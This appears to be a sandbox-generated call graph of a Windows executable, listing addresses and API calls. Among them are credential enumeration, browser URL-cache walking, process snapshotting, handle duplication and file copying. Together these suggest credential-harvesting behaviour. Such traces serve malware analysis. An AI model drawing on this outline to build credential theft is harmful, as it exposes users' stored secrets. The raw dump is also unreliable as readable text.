GetPrivateProfileStringW 38097->38105 38099 40db3e 38106 40d65d GetPrivateProfileStringW 38099->38106 38101 40db4f 38107 40d65d GetPrivateProfileStringW 38101->38107 38103->37858 38104->38096 38105->38099 38106->38101 38107->38103 38144 40eaff 38108->38144 38112 411ae2 memset 38111->38112 38113 411b8f 38111->38113 38184 409bca GetModuleFileNameW 38112->38184 38125 411a8b 38113->38125 38115 411b0a wcsrchr 38116 411b22 wcscat 38115->38116 38117 411b1f 38115->38117 38185 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38116->38185 38117->38116 38119 411b67 38186 402afb 38119->38186 38123 411b7f 38242 40ea13 SendMessageW memset SendMessageW 38123->38242 38126 402afb 27 API calls 38125->38126 38127 411ac0 38126->38127 38128 4110dc 38127->38128 38129 41113e 38128->38129 38134 4110f0 38128->38134 38267 40969c LoadCursorW SetCursor 38129->38267 38131 411143 38268 444a54 38131->38268 38271 4032b4 38131->38271 38289 40b1ab free free 38131->38289 38132 4110f7 _wcsicmp 38132->38134 38133 411157 38135 40ada2 _wcsicmp 38133->38135 38134->38129 38134->38132 38290 410c46 10 API calls 38134->38290 38138 411167 38135->38138 38136 4111af 38138->38136 38139 4111a6 qsort 38138->38139 38139->38136 38143->37939 38145 40eb10 38144->38145 38157 40e8e0 38145->38157 38148 40eb6c memcpy memcpy 38149 40ebb7 38148->38149 38149->38148 38150 40ebf2 ??2@YAPAXI ??2@YAPAXI 38149->38150 38153 40d134 16 API calls 38149->38153 38151 40ec2e ??2@YAPAXI 38150->38151 38152 40ec65 38150->38152 38151->38152 38167 40ea7f 38152->38167 38153->38149 38156 402f49 38156->37939 38158 40e8f2 38157->38158 38159 40e8eb ??3@YAXPAX 38157->38159 38160 40e900 38158->38160 38161 40e8f9 ??3@YAXPAX 38158->38161 38159->38158 38162 40e911 38160->38162 38163 40e90a ??3@YAXPAX 38160->38163 38161->38160 38164 40e931 ??2@YAPAXI ??2@YAPAXI 38162->38164 38165 40e921 ??3@YAXPAX 38162->38165 38166 40e92a ??3@YAXPAX 38162->38166 38163->38162 38164->38148 38165->38166 38166->38164 38168 40aa04 free 38167->38168 38169 40ea88 38168->38169 38170 40aa04 free 38169->38170 38171 40ea90 38170->38171 38172 40aa04 free 38171->38172 38173 40ea98 38172->38173 38174 40aa04 free 38173->38174 38175 40eaa0 38174->38175 38176 40a9ce 4 API calls 38175->38176 38177 40eab3 38176->38177 38178 40a9ce 4 API calls 38177->38178 38179 40eabd 38178->38179 38180 40a9ce 4 API calls 38179->38180 38181 40eac7 38180->38181 38182 40a9ce 4 API calls 38181->38182 38183 40ead1 38182->38183 38183->38156 38184->38115 38185->38119 38243 40b2cc 38186->38243 38188 402b0a 38189 40b2cc 27 API calls 38188->38189 38190 402b23 38189->38190 38191 40b2cc 27 API calls 38190->38191 38192 402b3a 38191->38192 38193 40b2cc 27 API calls 38192->38193 38194 402b54 38193->38194 38195 40b2cc 27 API calls 38194->38195 38196 402b6b 38195->38196 38197 40b2cc 27 API calls 38196->38197 38198 402b82 38197->38198 38199 40b2cc 27 API calls 38198->38199 38200 402b99 38199->38200 38201 40b2cc 27 API calls 38200->38201 38202 402bb0 38201->38202 38203 40b2cc 27 API calls 38202->38203 38204 402bc7 38203->38204 38205 40b2cc 27 API calls 38204->38205 38206 402bde 38205->38206 38207 40b2cc 27 API calls 38206->38207 38208 402bf5 38207->38208 38209 40b2cc 27 API calls 38208->38209 38210 402c0c 38209->38210 38211 40b2cc 27 API calls 38210->38211 38212 402c23 38211->38212 38213 40b2cc 27 API calls 38212->38213 38214 402c3a 38213->38214 38215 40b2cc 27 API calls 38214->38215 38216 402c51 38215->38216 38217 40b2cc 27 API calls 38216->38217 38218 402c68 38217->38218 38219 40b2cc 27 API calls 38218->38219 38220 402c7f 38219->38220 38221 40b2cc 27 API calls 38220->38221 38222 402c99 38221->38222 38223 40b2cc 27 API calls 38222->38223 38224 402cb3 38223->38224 38225 40b2cc 27 API calls 38224->38225 38226 402cd5 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402cf0 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402d0b 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402d26 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402d3e 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402d59 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402d78 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402d93 38239->38240 38241 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38240->38241 38241->38123 38242->38113 38246 40b58d 38243->38246 38245 40b2d1 38245->38188 38247 40b5a4 GetModuleHandleW FindResourceW 38246->38247 38248 40b62e 38246->38248 38249 40b5c2 LoadResource 38247->38249 38251 40b5e7 38247->38251 38248->38245 38250 40b5d0 SizeofResource LockResource 38249->38250 38249->38251 38250->38251 38251->38248 38259 40afcf 38251->38259 38253 40b608 memcpy 38262 40b4d3 memcpy 38253->38262 38255 40b61e 38263 40b3c1 18 API calls 38255->38263 38257 40b626 38264 40b04b 38257->38264 38260 40b04b ??3@YAXPAX 38259->38260 38261 40afd7 ??2@YAPAXI 38260->38261 38261->38253 38262->38255 38263->38257 38265 40b051 ??3@YAXPAX 38264->38265 38266 40b05f 38264->38266 38265->38266 38266->38248 38267->38131 38269 444a64 FreeLibrary 38268->38269 38270 444a83 38268->38270 38269->38270 38270->38133 38272 4032c4 38271->38272 38273 40b633 free 38272->38273 38274 403316 38273->38274 38291 44553b 38274->38291 38278 403480 38489 40368c 15 API calls 38278->38489 38280 403489 38281 40b633 free 38280->38281 38283 403495 38281->38283 38282 40333c 38282->38278 38284 4033a9 memset memcpy 38282->38284 38285 4033ec wcscmp 38282->38285 38487 4028e7 11 API calls 38282->38487 38488 40f508 6 API calls 38282->38488 38283->38133 38284->38282 38284->38285 38285->38282 38288 403421 _wcsicmp 38288->38282 38289->38133 38290->38134 38292 445548 38291->38292 38293 445599 38292->38293 38490 40c768 38292->38490 38294 4455a8 memset 38293->38294 38301 4457f2 38293->38301 38574 403988 38294->38574 38304 445854 38301->38304 38676 403e2d memset memset memset memset memset 38301->38676 38302 4455e5 38313 445672 38302->38313 38318 44560f 38302->38318 38303 4458bb memset memset 38306 414c2e 17 API calls 38303->38306 38357 4458aa 38304->38357 38699 403c9c memset memset memset memset memset 38304->38699 38309 4458f9 38306->38309 38308 44595e memset memset 38316 414c2e 17 API calls 38308->38316 38317 40b2cc 27 API calls 38309->38317 38311 44558c 38558 444b06 38311->38558 38312 44557a 38312->38311 38772 4136c0 CoTaskMemFree 38312->38772 38585 403fbe memset memset memset memset memset 38313->38585 38314 445a00 memset memset 38722 414c2e 38314->38722 38315 445b22 38321 445bca 38315->38321 38322 445b38 memset memset memset 38315->38322 38326 44599c 38316->38326 38328 445909 38317->38328 38330 4087b3 338 API calls 38318->38330 38320 445849 38788 40b1ab free free 38320->38788 38329 445c8b memset memset 38321->38329 38395 445cf0 38321->38395 38333 445bd4 38322->38333 38334 445b98 38322->38334 38327 40b2cc 27 API calls 38326->38327 38341 4459ac 38327->38341 38338 409d1f 6 API calls 38328->38338 38342 414c2e 17 API calls 38329->38342 38339 445621 38330->38339 38331 44589f 38789 40b1ab free free 38331->38789 38332 445585 38773 41366b FreeLibrary 38332->38773 38348 414c2e 17 API calls 38333->38348 38334->38333 38344 445ba2 38334->38344 38337 403335 38486 4452e5 45 API calls 38337->38486 38352 445919 38338->38352 38774 4454bf 20 API calls 38339->38774 38340 445823 38340->38320 38362 4087b3 338 API calls 38340->38362 38353 409d1f 6 API calls 38341->38353 38354 445cc9 38342->38354 38861 4099c6 wcslen 38344->38861 38345 4456b2 38776 40b1ab free free 38345->38776 38347 40b2cc 27 API calls 38358 445a4f 38347->38358 38349 445be2 38348->38349 38360 40b2cc 27 API calls 38349->38360 38350 445d3d 38380 40b2cc 27 API calls 38350->38380 38351 445d88 memset memset memset 38363 414c2e 17 API calls 38351->38363 38790 409b98 GetFileAttributesW 38352->38790 38364 4459bc 38353->38364 38365 409d1f 6 API calls 38354->38365 38355 445879 38355->38331 38376 4087b3 338 API calls 38355->38376 38357->38303 38381 44594a 38357->38381 38738 409d1f wcslen wcslen 38358->38738 38370 445bf3 38360->38370 38362->38340 38373 445dde 38363->38373 38857 409b98 GetFileAttributesW 38364->38857 38375 445ce1 38365->38375 38366 445bb3 38864 445403 memset 38366->38864 38367 445680 38367->38345 38608 4087b3 memset 38367->38608 38379 409d1f 6 API calls 38370->38379 38371 445928 38371->38381 38791 40b6ef 38371->38791 38382 40b2cc 27 API calls 38373->38382 38881 409b98 GetFileAttributesW 38375->38881 38376->38355 38378 40b2cc 27 API calls 38387 445a94 38378->38387 38389 445c07 38379->38389 38390 445d54 _wcsicmp 38380->38390 38381->38308 38394 4459ed 38381->38394 38393 445def 38382->38393 38383 4459cb 38383->38394 38403 40b6ef 253 API calls 38383->38403 38743 40ae18 38387->38743 38388 44566d 38388->38301 38659 413d4c 38388->38659 38399 445389 259 API calls 38389->38399 38400 445d71 38390->38400 38463 445d67 38390->38463 38392 445665 38775 40b1ab free free 38392->38775 38401 409d1f 6 API calls 38393->38401 38394->38314 38394->38315 38395->38337 38395->38350 38395->38351 38396 445389 259 API calls 38396->38321 38405 445c17 38399->38405 38882 445093 23 API calls 38400->38882 38408 445e03 38401->38408 38403->38394 38404 4456d8 38410 40b2cc 27 API calls 38404->38410 38411 40b2cc 27 API calls 38405->38411 38407 44563c 38407->38392 38413 4087b3 338 API calls 38407->38413 38883 409b98 GetFileAttributesW 38408->38883 38409 40b6ef 253 API calls 38409->38337 38415 4456e2 38410->38415 38416 445c23 38411->38416 38412 445d83 38412->38337 38413->38407 38777 413fa6 _wcsicmp _wcsicmp 38415->38777 38420 409d1f 6 API calls 38416->38420 38418 445e12 38424 445e6b 38418->38424 38431 40b2cc 27 API calls 38418->38431 38422 445c37 38420->38422 38421 4456eb 38427 4456fd memset memset memset memset 38421->38427 38428 4457ea 38421->38428 38429 445389 259 API calls 38422->38429 38423 445b17 38858 40aebe 38423->38858 38885 445093 23 API calls 38424->38885 38778 409c70 wcscpy wcsrchr 38427->38778 38781 413d29 38428->38781 38434 445c47 38429->38434 38435 445e33 38431->38435 38432 445e7e 38437 445f67 38432->38437 38440 40b2cc 27 API calls 38434->38440 38441 409d1f 6 API calls 38435->38441 38446 40b2cc 27 API calls 38437->38446 38438 445ab2 memset 38442 40b2cc 27 API calls 38438->38442 38444 445c53 38440->38444 38445 445e47 38441->38445 38447 445aa1 38442->38447 38443 409c70 2 API calls 38448 44577e 38443->38448 38449 409d1f 6 API calls 38444->38449 38884 409b98 GetFileAttributesW 38445->38884 38451 445f73 38446->38451 38447->38423 38447->38438 38452 409d1f 6 API calls 38447->38452 38750 40add4 38447->38750 38755 445389 38447->38755 38764 40ae51 38447->38764 38453 409c70 2 API calls 38448->38453 38454 445c67 38449->38454 38456 409d1f 6 API calls 38451->38456 38452->38447 38457 44578d 38453->38457 38458 445389 259 API calls 38454->38458 38455 445e56 38455->38424 38461 445e83 memset 38455->38461 38459 445f87 38456->38459 38457->38428 38465 40b2cc 27 API calls 38457->38465 38458->38321 38888 409b98 GetFileAttributesW 38459->38888 38464 40b2cc 27 API calls 38461->38464 38463->38337 38463->38409 38466 445eab 38464->38466 38467 4457a8 38465->38467 38468 409d1f 6 API calls 38466->38468 38469 409d1f 6 API calls 38467->38469 38470 445ebf 38468->38470 38471 4457b8 38469->38471 38472 40ae18 9 API calls 38470->38472 38780 409b98 GetFileAttributesW 38471->38780 38482 445ef5 38472->38482 38474 4457c7 38474->38428 38476 4087b3 338 API calls 38474->38476 38475 40ae51 9 API calls 38475->38482 38476->38428 38477 445f5c 38479 40aebe FindClose 38477->38479 38478 40add4 2 API calls 38478->38482 38479->38437 38480 40b2cc 27 API calls 38480->38482 38481 409d1f 6 API calls 38481->38482 38482->38475 38482->38477 38482->38478 38482->38480 38482->38481 38484 445f3a 38482->38484 38886 409b98 GetFileAttributesW 38482->38886 38887 445093 23 API calls 38484->38887 38486->38282 38487->38288 38488->38282 38489->38280 38491 40c775 38490->38491 38889 40b1ab free free 38491->38889 38493 40c788 38890 40b1ab free free 38493->38890 38495 40c790 38891 40b1ab free free 38495->38891 38497 40c798 38498 40aa04 free 38497->38498 38499 40c7a0 38498->38499 38892 40c274 memset 38499->38892 38504 40a8ab 9 API calls 38505 40c7c3 38504->38505 38506 40a8ab 9 API calls 38505->38506 38507 40c7d0 38506->38507 38921 40c3c3 38507->38921 38511 40c877 38520 40bdb0 38511->38520 38512 40c86c 38963 4053fe 39 API calls 38512->38963 38513 40c7e5 38513->38511 38513->38512 38519 40c634 50 API calls 38513->38519 38946 40a706 38513->38946 38519->38513 39246 404363 38520->39246 38523 40bf63 39266 40440c 38523->39266 38524 40bdee 38524->38523 38528 40b2cc 27 API calls 38524->38528 38525 40bddf CredEnumerateW 38525->38524 38529 40be02 wcslen 38528->38529 38530 40bf5d LocalFree 38529->38530 38537 40be1e 38529->38537 38530->38523 38531 40be26 wcsncmp 38531->38537 38534 40be7d memset 38535 40bea7 memcpy 38534->38535 38534->38537 38536 40bf11 wcschr 38535->38536 38535->38537 38536->38537 38537->38530 38537->38531 38537->38534 38537->38535 38537->38536 38538 40b2cc 27 API calls 38537->38538 38540 40bf43 LocalFree 38537->38540 39269 40bd5d 28 API calls 38537->39269 39270 404423 38537->39270 38539 40bef6 _wcsnicmp 38538->38539 38539->38536 38539->38537 38540->38537 38541 4135f7 39285 4135e0 38541->39285 38544 40b2cc 27 API calls 38545 41360d 38544->38545 38546 40a804 8 API calls 38545->38546 38547 413613 38546->38547 38548 41361b 38547->38548 38549 41363e 38547->38549 38550 40b273 27 API calls 38548->38550 38551 4135e0 FreeLibrary 38549->38551 38552 413625 GetProcAddress 38550->38552 38553 413643 38551->38553 38552->38549 38554 413648 38552->38554 38553->38312 38555 413658 38554->38555 38556 4135e0 FreeLibrary 38554->38556 38555->38312 38557 413666 38556->38557 38557->38312 39288 4449b9 38558->39288 38561 444c1f 38561->38293 38562 4449b9 42 API calls 38564 444b4b 38562->38564 38563 444c15 38566 4449b9 42 API calls 38563->38566 38564->38563 39309 444972 GetVersionExW 38564->39309 38566->38561 38567 444b99 memcmp 38572 444b8c 38567->38572 38568 444c0b 39313 444a85 42 API calls 38568->39313 38572->38567 38572->38568 39310 444aa5 42 API calls 38572->39310 39311 40a7a0 GetVersionExW 38572->39311 39312 444a85 42 API calls 38572->39312 38575 40399d 38574->38575 39314 403a16 38575->39314 38577 403a09 39328 40b1ab free free 38577->39328 38579 403a12 wcsrchr 38579->38302 38580 4039a3 38580->38577 38583 4039f4 38580->38583 39325 40a02c CreateFileW 38580->39325 38583->38577 38584 4099c6 2 API calls 38583->38584 38584->38577 38586 414c2e 17 API calls 38585->38586 38587 404048 38586->38587 38588 414c2e 17 API calls 38587->38588 38589 404056 38588->38589 38590 409d1f 6 API calls 38589->38590 38591 404073 38590->38591 38592 409d1f 6 API calls 38591->38592 38593 40408e 38592->38593 38594 409d1f 6 API calls 38593->38594 38595 4040a6 38594->38595 38596 403af5 20 API calls 38595->38596 38597 4040ba 38596->38597 38598 403af5 20 API calls 38597->38598 38599 4040cb 38598->38599 39355 40414f memset 38599->39355 38601 404140 39369 40b1ab free free 38601->39369 38602 4040ec memset 38606 4040e0 38602->38606 38604 404148 38604->38367 38605 4099c6 2 API calls 38605->38606 38606->38601 38606->38602 38606->38605 38607 40a8ab 9 API calls 38606->38607 38607->38606 39382 40a6e6 WideCharToMultiByte 38608->39382 38610 4087ed 39383 4095d9 memset 38610->39383 38613 408809 memset memset memset memset memset 38614 40b2cc 27 API calls 38613->38614 38615 4088a1 38614->38615 38616 409d1f 6 API calls 38615->38616 38617 4088b1 38616->38617 38618 40b2cc 27 API calls 38617->38618 38619 4088c0 38618->38619 38620 409d1f 6 API calls 38619->38620 38621 4088d0 38620->38621 38622 40b2cc 27 API calls 38621->38622 38623 4088df 38622->38623 38624 409d1f 6 API calls 38623->38624 38625 4088ef 38624->38625 38626 40b2cc 27 API calls 38625->38626 38627 4088fe 38626->38627 38628 409d1f 6 API calls 38627->38628 38629 40890e 38628->38629 38630 40b2cc 27 API calls 38629->38630 38631 40891d 38630->38631 38632 409d1f 6 API calls 38631->38632 38633 40892d 38632->38633 38640 408953 38640->38367 38660 40b633 free 38659->38660 38661 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38660->38661 38662 413f00 Process32NextW 38661->38662 38663 413da5 OpenProcess 38662->38663 38664 413f17 CloseHandle 38662->38664 38665 413eb0 38663->38665 38666 413df3 memset 38663->38666 38664->38404 38665->38662 38668 413ebf free 38665->38668 38669 4099f4 3 API calls 38665->38669 39808 413f27 38666->39808 38668->38665 38669->38665 38670 413e37 GetModuleHandleW 38672 413e46 GetProcAddress 38670->38672 38673 413e1f 38670->38673 38672->38673 38673->38670 39813 413959 38673->39813 39829 413ca4 38673->39829 38675 413ea2 CloseHandle 38675->38665 38677 414c2e 17 API calls 38676->38677 38678 403eb7 38677->38678 38679 414c2e 17 API calls 38678->38679 38680 403ec5 38679->38680 38681 409d1f 6 API calls 38680->38681 38682 403ee2 38681->38682 38683 409d1f 6 API calls 38682->38683 38684 403efd 38683->38684 38685 409d1f 6 API calls 38684->38685 38686 403f15 38685->38686 38687 403af5 20 API calls 38686->38687 38688 403f29 38687->38688 38689 403af5 20 API calls 38688->38689 38690 403f3a 38689->38690 38691 40414f 33 API calls 38690->38691 38697 403f4f 38691->38697 38692 403faf 39843 40b1ab free free 38692->39843 38694 403f5b memset 38694->38697 38695 403fb7 38695->38340 38696 4099c6 2 API calls 38696->38697 38697->38692 38697->38694 38697->38696 38698 40a8ab 9 API calls 38697->38698 38698->38697 38700 414c2e 17 API calls 38699->38700 38701 403d26 38700->38701 38702 414c2e 17 API calls 38701->38702 38703 403d34 38702->38703 38704 409d1f 6 API calls 38703->38704 38705 403d51 38704->38705 38706 409d1f 6 API calls 38705->38706 38707 403d6c 38706->38707 38708 409d1f 6 API calls 38707->38708 38709 403d84 38708->38709 38710 403af5 20 API calls 38709->38710 38711 403d98 38710->38711 38712 403af5 20 API calls 38711->38712 38713 403da9 38712->38713 38714 40414f 33 API calls 38713->38714 38719 403dbe 38714->38719 38715 403e1e 39844 40b1ab free free 38715->39844 38717 403dca memset 38717->38719 38718 403e26 38718->38355 38719->38715 38719->38717 38720 4099c6 2 API calls 38719->38720 38721 40a8ab 9 API calls 38719->38721 38720->38719 38721->38719 38723 414b81 9 API calls 38722->38723 38725 414c40 38723->38725 38724 414c73 memset 38727 414c94 38724->38727 38725->38724 39845 409cea 38725->39845 39848 414592 RegOpenKeyExW 38727->39848 38730 414c64 SHGetSpecialFolderPathW 38732 414d0b 38730->38732 38731 414cc1 38733 414cf4 wcscpy 38731->38733 39849 414bb0 wcscpy 38731->39849 38732->38347 38733->38732 38735 414cd2 39850 4145ac RegQueryValueExW 38735->39850 38737 414ce9 RegCloseKey 38737->38733 38739 409d62 38738->38739 38740 409d43 wcscpy 38738->38740 38739->38378 38741 409719 2 API calls 38740->38741 38742 409d51 wcscat 38741->38742 38742->38739 38744 40aebe FindClose 38743->38744 38745 40ae21 38744->38745 38746 4099c6 2 API calls 38745->38746 38747 40ae35 38746->38747 38748 409d1f 6 API calls 38747->38748 38749 40ae49 38748->38749 38749->38447 38751 40ade0 38750->38751 38754 40ae0f 38750->38754 38752 40ade7 wcscmp 38751->38752 38751->38754 38753 40adfe wcscmp 38752->38753 38752->38754 38753->38754 38754->38447 38756 40ae18 9 API calls 38755->38756 38761 4453c4 38756->38761 38757 40ae51 9 API calls 38757->38761 38758 4453f3 38760 40aebe FindClose 38758->38760 38759 40add4 2 API calls 38759->38761 38762 4453fe 38760->38762 38761->38757 38761->38758 38761->38759 38763 445403 254 API calls 38761->38763 38762->38447 38763->38761 38765 40ae7b FindNextFileW 38764->38765 38766 40ae5c FindFirstFileW 38764->38766 38767 40ae94 38765->38767 38768 40ae8f 38765->38768 38766->38767 38770 40aeb6 38767->38770 38771 409d1f 6 API calls 38767->38771 38769 40aebe FindClose 38768->38769 38769->38767 38770->38447 38771->38770 38772->38332 38773->38311 38774->38407 38775->38388 38776->38388 38777->38421 38779 409c89 38778->38779 38779->38443 38780->38474 38782 413d39 38781->38782 38783 413d2f FreeLibrary 38781->38783 38784 40b633 free 38782->38784 38783->38782 38785 413d42 38784->38785 38786 40b633 free 38785->38786 38787 413d4a 38786->38787 38787->38301 38788->38304 38789->38357 38790->38371 38792 44db70 38791->38792 38793 40b6fc memset 38792->38793 38794 409c70 2 API calls 38793->38794 38795 40b732 wcsrchr 38794->38795 38796 40b743 38795->38796 38797 40b746 memset 38795->38797 38796->38797 38798 40b2cc 27 API calls 38797->38798 38799 40b76f 38798->38799 38800 409d1f 6 API calls 38799->38800 38801 40b783 38800->38801 39851 409b98 GetFileAttributesW 38801->39851 38803 40b792 38804 40b7c2 38803->38804 38805 409c70 2 API calls 38803->38805 39852 40bb98 38804->39852 38807 40b7a5 38805->38807 38809 40b2cc 27 API calls 38807->38809 38813 40b7b2 38809->38813 38810 40b837 CloseHandle 38812 40b83e memset 38810->38812 38811 40b817 38814 409a45 3 API calls 38811->38814 39885 40a6e6 WideCharToMultiByte 38812->39885 38816 409d1f 6 API calls 38813->38816 38817 40b827 CopyFileW 38814->38817 38816->38804 38817->38812 38818 40b866 38819 444432 121 API calls 38818->38819 38821 40b879 38819->38821 38820 40bad5 38823 40baeb 38820->38823 38824 40bade DeleteFileW 38820->38824 38821->38820 38822 40b273 27 API calls 38821->38822 38825 40b89a 38822->38825 38826 40b04b ??3@YAXPAX 38823->38826 38824->38823 38827 438552 134 API calls 38825->38827 38828 40baf3 38826->38828 38829 40b8a4 38827->38829 38828->38381 38830 40bacd 38829->38830 38832 4251c4 137 API calls 38829->38832 38831 443d90 111 API calls 38830->38831 38831->38820 38855 40b8b8 38832->38855 38833 40bac6 39895 424f26 123 API calls 38833->39895 38834 40b8bd memset 39886 425413 17 API calls 38834->39886 38837 425413 17 API calls 38837->38855 38840 40a71b MultiByteToWideChar 38840->38855 38841 40a734 MultiByteToWideChar 38841->38855 38844 40b9b5 memcmp 38844->38855 38845 4099c6 2 API calls 38845->38855 38846 404423 38 API calls 38846->38855 38849 40bb3e memset memcpy 39896 40a734 MultiByteToWideChar 38849->39896 38850 4251c4 137 API calls 38850->38855 38852 40bb88 LocalFree 38852->38855 38855->38833 38855->38834 38855->38837 38855->38840 38855->38841 38855->38844 38855->38845 38855->38846 38855->38849 38855->38850 38856 40ba5f memcmp 38855->38856 39887 4253ef 16 API calls 38855->39887 39888 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38855->39888 39889 4253af 17 API calls 38855->39889 39890 4253cf 17 API calls 38855->39890 39891 447280 memset 38855->39891 39892 447960 memset memcpy memcpy memcpy 38855->39892 39893 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38855->39893 39894 447920 memcpy memcpy memcpy 38855->39894 38856->38855 38857->38383 38859 40aed1 38858->38859 38860 40aec7 FindClose 38858->38860 38859->38315 38860->38859 38862 4099d7 38861->38862 38863 4099da memcpy 38861->38863 38862->38863 38863->38366 38865 40b2cc 27 API calls 38864->38865 38866 44543f 38865->38866 38867 409d1f 6 API calls 38866->38867 38868 44544f 38867->38868 39984 409b98 GetFileAttributesW 38868->39984 38870 44545e 38871 445476 38870->38871 38872 40b6ef 253 API calls 38870->38872 38873 40b2cc 27 API calls 38871->38873 38872->38871 38874 445482 38873->38874 38875 409d1f 6 API calls 38874->38875 38876 445492 38875->38876 39985 409b98 GetFileAttributesW 38876->39985 38878 4454a1 38879 4454b9 38878->38879 38880 40b6ef 253 API calls 38878->38880 38879->38396 38880->38879 38881->38395 38882->38412 38883->38418 38884->38455 38885->38432 38886->38482 38887->38482 38888->38463 38889->38493 38890->38495 38891->38497 38893 414c2e 17 API calls 38892->38893 38894 40c2ae 38893->38894 38964 40c1d3 38894->38964 38899 40c3be 38916 40a8ab 38899->38916 38900 40afcf 2 API calls 38901 40c2fd FindFirstUrlCacheEntryW 38900->38901 38902 40c3b6 38901->38902 38903 40c31e wcschr 38901->38903 38904 40b04b ??3@YAXPAX 38902->38904 38905 40c331 38903->38905 38906 40c35e FindNextUrlCacheEntryW 38903->38906 38904->38899 38908 40a8ab 9 API calls 38905->38908 38906->38903 38907 40c373 GetLastError 38906->38907 38909 40c3ad FindCloseUrlCache 38907->38909 38910 40c37e 38907->38910 38911 40c33e wcschr 38908->38911 38909->38902 38912 40afcf 2 API calls 38910->38912 38911->38906 38913 40c34f 38911->38913 38914 40c391 FindNextUrlCacheEntryW 38912->38914 38915 40a8ab 9 API calls 38913->38915 38914->38903 38914->38909 38915->38906 39173 40a97a 38916->39173 38919 40a8cc 38919->38504 38920 40a8d0 7 API calls 38920->38919 39178 40b1ab free free 38921->39178 38923 40c3dd 38924 40b2cc 27 API calls 38923->38924 38925 40c3e7 38924->38925 39179 414592 RegOpenKeyExW 38925->39179 38927 40c3f4 38928 40c50e 38927->38928 38929 40c3ff 38927->38929 38943 405337 38928->38943 38930 40a9ce 4 API calls 38929->38930 38931 40c418 memset 38930->38931 39180 40aa1d 38931->39180 38934 40c471 38936 40c47a _wcsupr 38934->38936 38935 40c505 RegCloseKey 38935->38928 38937 40a8d0 7 API calls 38936->38937 38938 40c498 38937->38938 38939 40a8d0 7 API calls 38938->38939 38940 40c4ac memset 38939->38940 38941 40aa1d 38940->38941 38942 40c4e4 RegEnumValueW 38941->38942 38942->38935 38942->38936 39182 405220 38943->39182 38947 4099c6 2 API calls 38946->38947 38948 40a714 _wcslwr 38947->38948 38949 40c634 38948->38949 39239 405361 38949->39239 38952 40c65c wcslen 39242 4053b6 39 API calls 38952->39242 38953 40c71d wcslen 38953->38513 38955 40c677 38956 40c713 38955->38956 39243 40538b 39 API calls 38955->39243 39245 4053df 39 API calls 38956->39245 38959 40c6a5 38959->38956 38960 40c6a9 memset 38959->38960 38961 40c6d3 38960->38961 39244 40c589 44 API calls 38961->39244 38963->38511 38965 40ae18 9 API calls 38964->38965 38971 40c210 38965->38971 38966 40ae51 9 API calls 38966->38971 38967 40c264 38968 40aebe FindClose 38967->38968 38970 40c26f 38968->38970 38969 40add4 2 API calls 38969->38971 38976 40e5ed memset memset 38970->38976 38971->38966 38971->38967 38971->38969 38972 40c231 _wcsicmp 38971->38972 38973 40c1d3 35 API calls 38971->38973 38972->38971 38974 40c248 38972->38974 38973->38971 38989 40c084 22 API calls 38974->38989 38977 414c2e 17 API calls 38976->38977 38978 40e63f 38977->38978 38979 409d1f 6 API calls 38978->38979 38980 40e658 38979->38980 38990 409b98 GetFileAttributesW 38980->38990 38982 40e667 38983 40e680 38982->38983 38984 409d1f 6 API calls 38982->38984 38991 409b98 GetFileAttributesW 38983->38991 38984->38983 38986 40e68f 38987 40c2d8 38986->38987 38992 40e4b2 38986->38992 38987->38899 38987->38900 38989->38971 38990->38982 38991->38986 39013 40e01e 38992->39013 38994 40e593 38995 40e5b0 38994->38995 38996 40e59c DeleteFileW 38994->38996 38997 40b04b ??3@YAXPAX 38995->38997 38996->38995 38999 40e5bb 38997->38999 38998 40e521 38998->38994 39036 40e175 38998->39036 39001 40e5c4 CloseHandle 38999->39001 39002 40e5cc 38999->39002 39001->39002 39004 40b633 free 39002->39004 39003 40e573 39005 40e584 39003->39005 39006 40e57c CloseHandle 39003->39006 39007 40e5db 39004->39007 39079 40b1ab free free 39005->39079 39006->39005 39009 40b633 free 39007->39009 39010 40e5e3 39009->39010 39010->38987 39012 40e540 39012->39003 39056 40e2ab 39012->39056 39080 406214 39013->39080 39016 40e16b 39016->38998 39019 40afcf 2 API calls 39020 40e08d OpenProcess 39019->39020 39021 40e0a4 GetCurrentProcess DuplicateHandle 39020->39021 39025 40e152 39020->39025 39022 40e0d0 GetFileSize 39021->39022 39023 40e14a CloseHandle 39021->39023 39116 409a45 GetTempPathW 39022->39116 39023->39025 39024 40e160 39028 40b04b ??3@YAXPAX 39024->39028 39025->39024 39027 406214 22 API calls 39025->39027 39027->39024 39028->39016 39029 40e0ea 39119 4096dc CreateFileW 39029->39119 39031 40e0f1 CreateFileMappingW 39032 40e140 CloseHandle CloseHandle 39031->39032 39033 40e10b MapViewOfFile 39031->39033 39032->39023 39034 40e13b CloseHandle 39033->39034 39035 40e11f WriteFile UnmapViewOfFile 39033->39035 39034->39032 39035->39034 39037 40e18c 39036->39037 39120 406b90 39037->39120 39040 40e1a7 memset 39046 40e1e8 39040->39046 39041 40e299 39152 4069a3 39041->39152 39047 40e283 39046->39047 39048 40dd50 _wcsicmp 39046->39048 39054 40e244 _snwprintf 39046->39054 39130 406e8f 39046->39130 39159 40742e 8 API calls 39046->39159 39160 40aae3 wcslen wcslen _memicmp 39046->39160 39161 406b53 SetFilePointerEx ReadFile 39046->39161 39049 40e291 39047->39049 39050 40e288 free 39047->39050 39048->39046 39051 40aa04 free 39049->39051 39050->39049 39051->39041 39055 40a8d0 7 API calls 39054->39055 39055->39046 39057 40e2c2 39056->39057 39058 406b90 11 API calls 39057->39058 39059 40e2d3 39058->39059 39060 40e4a0 39059->39060 39062 406e8f 13 API calls 39059->39062 39065 40e489 39059->39065 39068 40dd50 _wcsicmp 39059->39068 39074 40e3e0 memcpy 39059->39074 39075 40e3fb memcpy 39059->39075 39076 40e3b3 wcschr 39059->39076 39077 40e416 memcpy 39059->39077 39078 40e431 memcpy 39059->39078 39162 40dd50 _wcsicmp 39059->39162 39171 40742e 8 API calls 39059->39171 39172 406b53 SetFilePointerEx ReadFile 39059->39172 39061 4069a3 2 API calls 39060->39061 39063 40e4ab 